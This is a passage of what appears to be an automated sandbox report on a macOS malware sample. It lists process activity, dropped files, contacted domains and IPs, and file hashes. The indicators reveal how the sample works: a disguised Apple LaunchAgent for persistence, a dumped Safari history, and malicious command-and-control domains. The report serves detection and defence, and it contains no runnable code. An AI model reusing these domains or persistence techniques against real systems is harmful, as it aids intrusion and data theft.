          • sh (PID: 568 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 568 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 569 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 569 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 569 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 570 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 570 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 570 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 571 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 571 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 571 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 572 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 572 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 572 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 573 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 573 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 573 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 574 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 574 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 574 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 575 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 575 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 575 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 576 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 576 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 576 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 577 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 577 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 577 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 578 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 578 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 578 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 579 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 579 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 579 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 580 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 580 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 580 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 581 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 581 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 581 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 582 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 582 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 582 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 583 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 583 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 583 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 584 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 584 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 584 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 585 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 585 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 585 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 586 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 586 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 586 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 587 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 587 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 587 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 588 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 588 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 588 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 589 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 589 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 589 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 590 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 590 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 590 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 591 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 591 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 591 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 592 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 592 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 592 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 593 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 593 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 593 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
  • cleanup

Created / dropped Files

/Library/.cachedir/.dat.nosync01f9.oWo2Oy
File Type:ASCII text, with very long lines
MD5:AF2B96F8B547479A8AD1DE1C0A464136
SHA1:CC7CCA36A524E898032ADB9DF5162FF5CED33635
SHA-256:932DDE89F232DB6E4E64001269DB80B58806583D4880FC77FAE10B94A37C958C
SHA-512:7D042E73898F8CD3BBBC6B55CF2D560AF2AD0AE4D05D00716C8D085C1B06CC6CDEEF75D86B141B790091AA03DD786D6B5F89DF881EDEFB9D89C131611AEC3677
Malicious:false
/Library/.random/xpcd.app/Contents/Info.plist
File Type:XML document text
MD5:0B871CD9C7710CB28F4BBE9A0AEB685D
SHA1:353A838CE9D48783A6230275EB8862B5AEAFE619
SHA-256:4B43596BD0291FB1542AF6E05D99C333A1DD14ED2051D6F8CAED70D48DDCE7E6
SHA-512:1125962944BB0C623A0C203BE51C24191A3ECD3ADD9D4998147A17A1A5902B4DB6083D1E12C01C1404120426187279C8B4E5DB9BFB633472E8D0CFECFD9AFEE0
Malicious:true
/Library/.random/xpcd.app/Contents/MacOS/xpc
File Type:Mach-O 64-bit executable
MD5:4FFC432CFC0FD82C9252B6E206830DCB
SHA1:FFE054874AA1636263DEA6A7F90509C470F41689
SHA-256:162245E4D569E1899B1F7DC3467448C7CD95592E799A407F8636178B7026ED40
SHA-512:48C633A0C95031DF6CA647B8B2F03354363D8D873468071E2CD15FD4CE9B26E1AC21B6AE24F1ABC455A1AA0AE58937BB865AE397F98DF21E74D67649E5EB9772
Malicious:true
/Library/.random/xpcd.app/Contents/PkgInfo
File Type:ASCII text, with no line terminators
MD5:23B7D7D024ABB0F558420E098800BF27
SHA1:9F9EEA0CFE2D65F2C3D6B092E375B40782D08F31
SHA-256:82502191C9484B04D685374F9879A0066069C49B8ACAE7A04B01D38D07E8ECA0
SHA-512:F77D501528DD0CED155C80406CFBEE38D5D3649B64D2A9324F3D6CEE39491EB8F54CDEBAE49C6E21A20D2309D8FAE1B01C41631224811E73483DB25A2695738C
Malicious:false
/Library/.random/xpcd.app/Contents/Resources/.checksum
File Type:data
MD5:A8327DC44CF8945E8624D791C37F558E
SHA1:5B025EC67453325CBA4B3400B31FBA8E0D06AD26
SHA-256:313DE477915EFE3B2AB833F316B62E435CE85D27EDFD1925CDB3111007F26896
SHA-512:C6808BDBFA029873EB6790149888967C11E47989D6C249CA0EE76DD3B3F1861993984AAF6B12FBDA663D1D48F6A8B154EE132B5CE24AFBA9416C4EC248370A75
Malicious:false
/Library/.random/xpcd.app/Contents/Resources/.crc32
File Type:DBase 3 data file (1348107645 records)
MD5:8A390BECBEE33424B0D04DC41DFA4BBA
SHA1:9C625EE60A2EB8D53F066B7101F29242B39AABDE
SHA-256:613D39C499C95CCFA4489475BE1EDF9FAB061C52D13271A1CD4E3952D974C93A
SHA-512:1FDDA4088C501B674C910851C7B6285835BF84A2552DA3CCA034FE592028EB3A24A3BAF511F4B45092902EBD629FEC08925041017FB70CD534B0B9DD0249C226
Malicious:false
/Library/.random/xpcd.app/Contents/Resources/Finder.icns
File Type:data
MD5:457DE02C4B3031F3A3727A004378996B
SHA1:EEB05B62D7CF08F4AA5516E3FC5D670C3408B10F
SHA-256:B601E973F471BFC86DE134B33FBEEA04E410952CF494B8952EDC8EA85DA3A542
SHA-512:DC314D036769BA66251D1A94A1248BC27F335F021D713186058C42D6D939762E9BA8D8E189FFEF2AD8EE9148C793F158AE021B245159DE9DDB6573A49105565B
Malicious:false
/Library/.random/xpcd.app/Contents/Resources/MainMenu.nib
File Type:Apple binary property list
MD5:D905DF9BE2BCEBB87D5992FE6B32D6E7
SHA1:59DE10ABB0AA1D32BC34C3683105A06ADEEA33A7
SHA-256:E144427D382CA4D8F4D13CCBE04FBD790EDAD5FF6288F2BEEFFAECF229981F00
SHA-512:FA746B280EABFBA12506C84B27ADCB285BC80BBE643C872CC043A1750EE4938DFD9CFF517B5F69FD51C5C3CCBCEB3BE744D578C100A856A28EC0CB02A1CEBEA6
Malicious:false
/Library/.random/xpcd.app/Contents/Resources/Schema.py
File Type:ASCII English text
MD5:FB872FB8FC1B833C31E983D3303B67DE
SHA1:2A72C835D5267EB962A81E6A007A28EB7C7B7C01
SHA-256:C6866C022C2BCF2BCA8A62650D7F864AC5911319B15B1529A1BBF6272676833F
SHA-512:DBE8CBCF52BE1D90F903030F765A05E4CFE7B914E9A0B5A1E751D4CF4DA813DAB50C76F2B07ED3F65BEFD8CBE7C5A3D3B956CD4B2CCE13248FA5FF353842FB65
Malicious:false
/Library/.random/xpcd.app/Contents/Resources/Security.png
File Type:PNG image, 128 x 128, 8-bit/color RGBA, non-interlaced
MD5:72622CDD06638FA694128065226385B4
SHA1:A74AF9951F000570950B8C99CDC76359AEDF33B8
SHA-256:27D83C4824B9C74B3DCC47BEE170C9772EFBEC697823EFB6C08CE79B47DA866E
SHA-512:53E9E16C5737CEEB8B20BD59371484043DE0F15BD3799A996E5D848D20BBE929F4E9534CA2E5BC49CD60EFF62D5E9B6857C40B29E5CEE1240066E1C2B7FBE80C
Malicious:false
/Library/.random/xpcd.app/Contents/Resources/cb.py
File Type:ASCII Java program text, with very long lines
MD5:8BBA84409774C72779393E0AF020B408
SHA1:490821B11D6D240D1BD9FD977EE264607DE4C252
SHA-256:CD59B8256805E0C03D34FAE3389A5C25EDE6AA8CD12678C2D7E6404110B76B62
SHA-512:918A8C213474B738F2AD2CA20B44C987893898EF930396EACF0057CCA750D46FA3D2D8944F11670501C0DD31572AA1FD3879D59A2D662563296820A28139A06C
Malicious:false
/Library/.random/xpcd.app/Contents/Resources/ch.py
File Type:ASCII Java program text, with very long lines
MD5:573FCD799925DB4FD29A1063B40D148A
SHA1:C115953891645A82794D9C9BF0CDAAAB177290E8
SHA-256:EDACC883F301F1C330F5BD16F90D83E278F080DEE546AB1EA194D04BDC41CE7D
SHA-512:B04DB62253C56844A1CC324FD5E870568554A97845783E1D679A5A51E6A119221AC41DD2EC32BABBEF98359643272D3A3EF19129CB417D845B4DECBCFAAE0C48
Malicious:false
/Library/.random/xpcd.app/Contents/Resources/pbkdf2.py
File Type:ASCII Java program text
MD5:40372CFC947FCEB640B6E11A395C473E
SHA1:7767A4F4FEDA7A8C6C400740F4354A3BD2EAF25A
SHA-256:E043C005382FBC35BFA8E198D769C4117AF47500C994744B9D61F3F49DC1FC27
SHA-512:EFB0D43705D910D35E245BE24C8DB261AF755344AF110B5DFE5713EDAEE3FFF8EA36BFEBF310E6B2C0720BCABDB733A0C22669FF8D42F85530717BD1A2FF002B
Malicious:false
/Library/.random/xpcd.app/Contents/Resources/pyDes.py
File Type:ASCII English text
MD5:57C48AE7EC9F32DD6127997FE938E97E
SHA1:741D741BE0CE3B078DB8D2BD7DE18E8E7FBCEA64
SHA-256:23B01427953F63F3DF64E633DB863EB3FB18BCCCA8CA75D7B412A2B9A0EADC11
SHA-512:CB94C336E71B35F14BD4F387B2EB00B2343C54A1222DF6070D373DA754566552508BDE638C95E84E510F00FF011CC8C3367DEE2E9D4B40696C80BF575BB385C2
Malicious:false
/Library/Application Support/Apple/Remote Desktop/RemoteManagement.launchd
File Type:ASCII text, with no line terminators
MD5:A10311459433ADF322F2590A4987C423
SHA1:3EA3F9802ACCF8817BACD6F3DF46A73B93CCDDEC
SHA-256:FB9CF75606B4070DD6A9705810906BBA28D0E2EA74FF301B999A91DBB68C7D98
SHA-512:C0866AE6C853BA1B1CF7BAD0986399CE5516358E0320F31FDE9AAE552593F5939674071CD28086D0279E54C6372AF8C7CC2BDC06F173A38FCD9C27C49C7A8874
Malicious:false
/Library/LaunchAgents/com.apple.xpcd.plist
File Type:XML document text
MD5:8E3502947BB53644FF9FD93464A142DB
SHA1:66D742062A709A2984D8E6D37F4F59D7F8B72CF7
SHA-256:49CDFE81F012CD98002124B2E2B39FE61D4E7E3267F3A7F5A6408D5962E9E476
SHA-512:5DEE438345BFBF275E6C540A6B12A584B5E2E70339D074A32E04F3026750EC70AEA110B3C44EBC14F323CFEC9B1BD8C4BB105C69A150FE4D1DB977E611089EA7
Malicious:true
/Users/vreni/Library/Safari/History.db.dump
File Type:SQLite 3.x database, user version 8
MD5:D4892ED6A12DB443885749E9EAE1C9E3
SHA1:A9B56918CDDE04285D4173B108041147547685F4
SHA-256:38B579DE78C5ACFB25E21366693DD7D8A33CD98AC9A37AD14D02C4EE2D0031A4
SHA-512:0D9D7C61774812CF0E5644B1866023FB3962430F9249A968DDE96891D20C49E370C226C52304E24276D7935B161BAD80E7A4214DD66AD5B88671B7A002FEDD82
Malicious:true
/dev/null
File Type:ASCII text
MD5:A2D0A23B9912BDB4A066AB88FADF3472
SHA1:86819B99D70218D4129D9E7FFD1EFA801C7EC7BB
SHA-256:DB51EDD3D154859F6CF3711E3904ADE5754ECC06E4653F0027ABE6704493C5AD
SHA-512:B32F6C100EEE7FEEEC50EB468B78E814E0B66EBD12A1613E6E34E01C5B5BCAE003D13F704AF7A0909C5EC7BEB237DF6312C820ABCB99196C715FA3FAF642121A
Malicious:false
/private/tmp/.dio3we/..prelim.png-GB5W
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
MD5:F02A47A9B4742DFE867720FDC6BA97E9
SHA1:3269A026F0AE22BEE9D3629572CBE3D19D2FB08A
SHA-256:EEF8A21821745F7BA6946A6B40EE659F160ECE5D9A59891CDE8DDA80BF092A53
SHA-512:FE1C20747ADB9C9921CF214805D77500CAE9F3507D3BCC1FD231D6B9F1EE1F7593899D5BC0E86E3202B7047C25E0442F5E74312AA0F2172B5EE1393EC0007A5A
Malicious:false
/private/tmp/.dio3we/.dat.nosync01dc.lbqoPC
File Type:ASCII text, with very long lines
MD5:0757EA53356DC6F98196AC24629815A8
SHA1:890ADAB62C0D6AE674041D6968E78C3FC56A6998
SHA-256:8033CAF1BD14B08EA73A8CA77C0FD9917320BE71E87773BDFBED3FD0042DCBA5
SHA-512:EEE9883871DC20092A54D99D9D2488BAFDF80DBD1BB02DB21AA2DE182EF54DF3162B342FDA725DEFAF3B7904B8F895CEA98DA838E1DCCE3B2519A28D71B7B6D6
Malicious:false
/private/tmp/.dio3we/ziPHlHPH
File Type:Zip archive data, at least v1.0 to extract
MD5:FF030EF8058038601AF718AC6C595643
SHA1:4CB87259B4BC7BECBA4FA9D005B8E1CB4CE02371
SHA-256:3715F9FE485920BE7C38C7C4CC359EF1C20B6A66D2BAFBF6CDCDF858E2E3832A
SHA-512:B8431F7E49D951C52B2CFE35557F77A724092FD46FCEF17472B4EE418F319FB05A9EBADC3FC79544207B71AA22CF21D4AA80C3B5FFD5A867B244CA9F0A37628D
Malicious:false
/private/tmp/.dio3we/ziRJb6aY
File Type:Zip archive data, at least v1.0 to extract
MD5:AAD724623C3E55C4B381E8ED56C018FE
SHA1:ACEAED0990E8279D7FBF8B78EA9207A8D71F4CA9
SHA-256:1E12E3680B6F6E8CB4B8BED9E190667791F6D7CE3605D25D9B79FECCC3B9A857
SHA-512:8D7C69A21FB18D2938D905FA491AD42311A82C0172F3D5494D7DBE02EE84EB8200E5D8A2B1D6368D8AC22185EA849370B3DEFE13AB1B4D9D57BC8B442B042CAF
Malicious:false
/private/tmp/.sklerfde
File Type:ASCII text
MD5:E351942B5C9EEA18E10F09342D06FC62
SHA1:DC89B52795E1A514C8ABE97C8A2B5D746CBF04AB
SHA-256:83FF10477360E76DC7236E9D15D5E3ABB07395A692D2F8D89B61BAC7C62B4936
SHA-512:B287FA21678983B9544C2313F3EA041E4D14E6DDAEF2F10EC25056AACC174519579385ACA47F0E5C34C1298920EEA9E2058D833FAD704144108C64BE8214AE0A
Malicious:false
/private/tmp/public.pem
File Type:ASCII text
MD5:5C1B0120B41C037CC6B5880D2AEB57C0
SHA1:150C37A9EC2114D1750E51D203AAFCC256C38E18
SHA-256:4C67239F41544D461C36768DDF88E73508646F44EB041ED20E931F5B477F6BBD
SHA-512:2E3E468A39DE9B40CC38B4D7B193D641156A71C0ED18C68E2ED1B19002A563EB22AEABB8D14EE8D1CA0A072613C7B97D9719462D0B1576AB404C0B65602C5E33
Malicious:false
/private/tmp/xpc.app/Contents/Info.plist
File Type:XML document text
MD5:31199EBFDCB16F77A5609CF1034E241E
SHA1:4E2045A072FC6102067EE381F424B7551B27CB95
SHA-256:6BB82734A5254CB90E1E7FC9A510F531A49D04AD8AFF67A87624301ECA7B3254
SHA-512:357C918848C66EF971F7DB970E66D4B1D65E79B59D0D4C067B7AB46BC8EBC085022137E818C538EF6E6448A049AC2D7489B287097CC14A68DA6C4EEC235D21B0
Malicious:false
/private/tmp/xpc.app/Contents/MacOS/xpc
File Type:Mach-O 64-bit executable
MD5:4FFC432CFC0FD82C9252B6E206830DCB
SHA1:FFE054874AA1636263DEA6A7F90509C470F41689
SHA-256:162245E4D569E1899B1F7DC3467448C7CD95592E799A407F8636178B7026ED40
SHA-512:48C633A0C95031DF6CA647B8B2F03354363D8D873468071E2CD15FD4CE9B26E1AC21B6AE24F1ABC455A1AA0AE58937BB865AE397F98DF21E74D67649E5EB9772
Malicious:false
/private/tmp/xpc.app/Contents/PkgInfo
File Type:ASCII text, with no line terminators
MD5:23B7D7D024ABB0F558420E098800BF27
SHA1:9F9EEA0CFE2D65F2C3D6B092E375B40782D08F31
SHA-256:82502191C9484B04D685374F9879A0066069C49B8ACAE7A04B01D38D07E8ECA0
SHA-512:F77D501528DD0CED155C80406CFBEE38D5D3649B64D2A9324F3D6CEE39491EB8F54CDEBAE49C6E21A20D2309D8FAE1B01C41631224811E73483DB25A2695738C
Malicious:false
/private/tmp/xpc.app/Contents/Resources/.checksum
File Type:data
MD5:A8327DC44CF8945E8624D791C37F558E
SHA1:5B025EC67453325CBA4B3400B31FBA8E0D06AD26
SHA-256:313DE477915EFE3B2AB833F316B62E435CE85D27EDFD1925CDB3111007F26896
SHA-512:C6808BDBFA029873EB6790149888967C11E47989D6C249CA0EE76DD3B3F1861993984AAF6B12FBDA663D1D48F6A8B154EE132B5CE24AFBA9416C4EC248370A75
Malicious:false
/private/tmp/xpc.app/Contents/Resources/.crc32
File Type:DBase 3 data file (1348107645 records)
MD5:8A390BECBEE33424B0D04DC41DFA4BBA
SHA1:9C625EE60A2EB8D53F066B7101F29242B39AABDE
SHA-256:613D39C499C95CCFA4489475BE1EDF9FAB061C52D13271A1CD4E3952D974C93A
SHA-512:1FDDA4088C501B674C910851C7B6285835BF84A2552DA3CCA034FE592028EB3A24A3BAF511F4B45092902EBD629FEC08925041017FB70CD534B0B9DD0249C226
Malicious:false
/private/tmp/xpc.app/Contents/Resources/Finder.icns
File Type:data
MD5:457DE02C4B3031F3A3727A004378996B
SHA1:EEB05B62D7CF08F4AA5516E3FC5D670C3408B10F
SHA-256:B601E973F471BFC86DE134B33FBEEA04E410952CF494B8952EDC8EA85DA3A542
SHA-512:DC314D036769BA66251D1A94A1248BC27F335F021D713186058C42D6D939762E9BA8D8E189FFEF2AD8EE9148C793F158AE021B245159DE9DDB6573A49105565B
Malicious:false
/private/tmp/xpc.app/Contents/Resources/MainMenu.nib
File Type:Apple binary property list
MD5:D905DF9BE2BCEBB87D5992FE6B32D6E7
SHA1:59DE10ABB0AA1D32BC34C3683105A06ADEEA33A7
SHA-256:E144427D382CA4D8F4D13CCBE04FBD790EDAD5FF6288F2BEEFFAECF229981F00
SHA-512:FA746B280EABFBA12506C84B27ADCB285BC80BBE643C872CC043A1750EE4938DFD9CFF517B5F69FD51C5C3CCBCEB3BE744D578C100A856A28EC0CB02A1CEBEA6
Malicious:false
/private/tmp/xpc.app/Contents/Resources/Schema.py
File Type:ASCII English text
MD5:FB872FB8FC1B833C31E983D3303B67DE
SHA1:2A72C835D5267EB962A81E6A007A28EB7C7B7C01
SHA-256:C6866C022C2BCF2BCA8A62650D7F864AC5911319B15B1529A1BBF6272676833F
SHA-512:DBE8CBCF52BE1D90F903030F765A05E4CFE7B914E9A0B5A1E751D4CF4DA813DAB50C76F2B07ED3F65BEFD8CBE7C5A3D3B956CD4B2CCE13248FA5FF353842FB65
Malicious:false
/private/tmp/xpc.app/Contents/Resources/Security.png
File Type:PNG image, 128 x 128, 8-bit/color RGBA, non-interlaced
MD5:72622CDD06638FA694128065226385B4
SHA1:A74AF9951F000570950B8C99CDC76359AEDF33B8
SHA-256:27D83C4824B9C74B3DCC47BEE170C9772EFBEC697823EFB6C08CE79B47DA866E
SHA-512:53E9E16C5737CEEB8B20BD59371484043DE0F15BD3799A996E5D848D20BBE929F4E9534CA2E5BC49CD60EFF62D5E9B6857C40B29E5CEE1240066E1C2B7FBE80C
Malicious:false
/private/tmp/xpc.app/Contents/Resources/cb.py
File Type:ASCII Java program text, with very long lines
MD5:8BBA84409774C72779393E0AF020B408
SHA1:490821B11D6D240D1BD9FD977EE264607DE4C252
SHA-256:CD59B8256805E0C03D34FAE3389A5C25EDE6AA8CD12678C2D7E6404110B76B62
SHA-512:918A8C213474B738F2AD2CA20B44C987893898EF930396EACF0057CCA750D46FA3D2D8944F11670501C0DD31572AA1FD3879D59A2D662563296820A28139A06C
Malicious:false
/private/tmp/xpc.app/Contents/Resources/ch.py
File Type:ASCII Java program text, with very long lines
MD5:573FCD799925DB4FD29A1063B40D148A
SHA1:C115953891645A82794D9C9BF0CDAAAB177290E8
SHA-256:EDACC883F301F1C330F5BD16F90D83E278F080DEE546AB1EA194D04BDC41CE7D
SHA-512:B04DB62253C56844A1CC324FD5E870568554A97845783E1D679A5A51E6A119221AC41DD2EC32BABBEF98359643272D3A3EF19129CB417D845B4DECBCFAAE0C48
Malicious:false
/private/tmp/xpc.app/Contents/Resources/pbkdf2.py
File Type:ASCII Java program text
MD5:40372CFC947FCEB640B6E11A395C473E
SHA1:7767A4F4FEDA7A8C6C400740F4354A3BD2EAF25A
SHA-256:E043C005382FBC35BFA8E198D769C4117AF47500C994744B9D61F3F49DC1FC27
SHA-512:EFB0D43705D910D35E245BE24C8DB261AF755344AF110B5DFE5713EDAEE3FFF8EA36BFEBF310E6B2C0720BCABDB733A0C22669FF8D42F85530717BD1A2FF002B
Malicious:false
/private/tmp/xpc.app/Contents/Resources/pyDes.py
File Type:ASCII English text
MD5:57C48AE7EC9F32DD6127997FE938E97E
SHA1:741D741BE0CE3B078DB8D2BD7DE18E8E7FBCEA64
SHA-256:23B01427953F63F3DF64E633DB863EB3FB18BCCCA8CA75D7B412A2B9A0EADC11
SHA-512:CB94C336E71B35F14BD4F387B2EB00B2343C54A1222DF6070D373DA754566552508BDE638C95E84E510F00FF011CC8C3367DEE2E9D4B40696C80BF575BB385C2
Malicious:false
/private/var/folders/rz/z4lzdb9n2yg9fdd643nf823w0000gn/C/mds/mdsDirectory.db_
File Type:Mac OS X Keychain File
MD5:6DB32722D4433D8D1738176EE72B2A46
SHA1:E2F77F2095D6C14AB31B96BBE7635537724675B7
SHA-256:F2B224F39B2A80213901D13EBAB7AE953B6C79ACB082B8D8089334D429FF7A81
SHA-512:9F6521FBB23ABCCCD23DD09BE5471277121C8CCE5792ECFA72E2E0470E0C702EE742877DF06DE216BE4B848608AD41ED4B10971D79A7F3E2E39454BDD7FAB96A
Malicious:false
/private/var/folders/rz/z4lzdb9n2yg9fdd643nf823w0000gn/C/mds/mdsObject.db_
File Type:Mac OS X Keychain File
MD5:C47D9C6429C1B111D8F00AF9BD3A942D
SHA1:5BBB82B300AF1A2C8525DF843FA155D993A5E3CA
SHA-256:A8C0A18F1682BBA51781BB8C157A23A5D648D1C85BB137B2A0F485114380E397
SHA-512:0D29EBD48AD6B0EF62CF2400CB5C8338D2F400FACA95A453691AD9114E20AEAAF1ED163BE12306CC4221BEA074BFE134597563A689028CF13A612C11EF7062CB
Malicious:false

Contacted Domains/Contacted IPs

Contacted Domains

NameIPActiveMaliciousAntivirus Detection
script.google.com216.58.198.206truefalse
symantecheurengine.com66.70.246.5truetrue
script.googleusercontent.com216.58.198.193truefalse
abrahamlincolnisaliveandrunssymantec.comunknownunknowntrue
symeher.counknownunknowntrue
kio2349329490jfdkf394.comunknownunknowntrue
symheureng.comunknownunknowntrue
klsadkla93242lokiloki.comunknownunknowntrue

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPCountryFlagASNASN NameMalicious
8.8.8.8United States
15169GOOGLE-GoogleIncUSfalse
216.58.198.193United States
15169GOOGLE-GoogleIncUSfalse
17.253.37.210United States
6185APPLE-AUSTIN-AppleIncUSfalse
224.0.0.251Reserved
unknownunknownfalse
216.58.198.206United States
15169GOOGLE-GoogleIncUSfalse
66.70.246.5Canada
16276OVHFRfalse

Static File Info

General

File type:Zip archive data, at least v2.0 to extract
TrID:
  • Mac OS X Application Bundle (12004/1) 74.99%
  • ZIP compressed archive (4004/1) 25.01%
File name:BiyuYDBAMc.app
File size:2600472
MD5:6af212f189c28a3111b2dfa63f02ab4f
SHA1:700930967549feeb359788f3e0769837e14b3834
SHA256:a681c5c80e31cc990386bcf1a01d019270e7a2078306865f164b762d640bea12
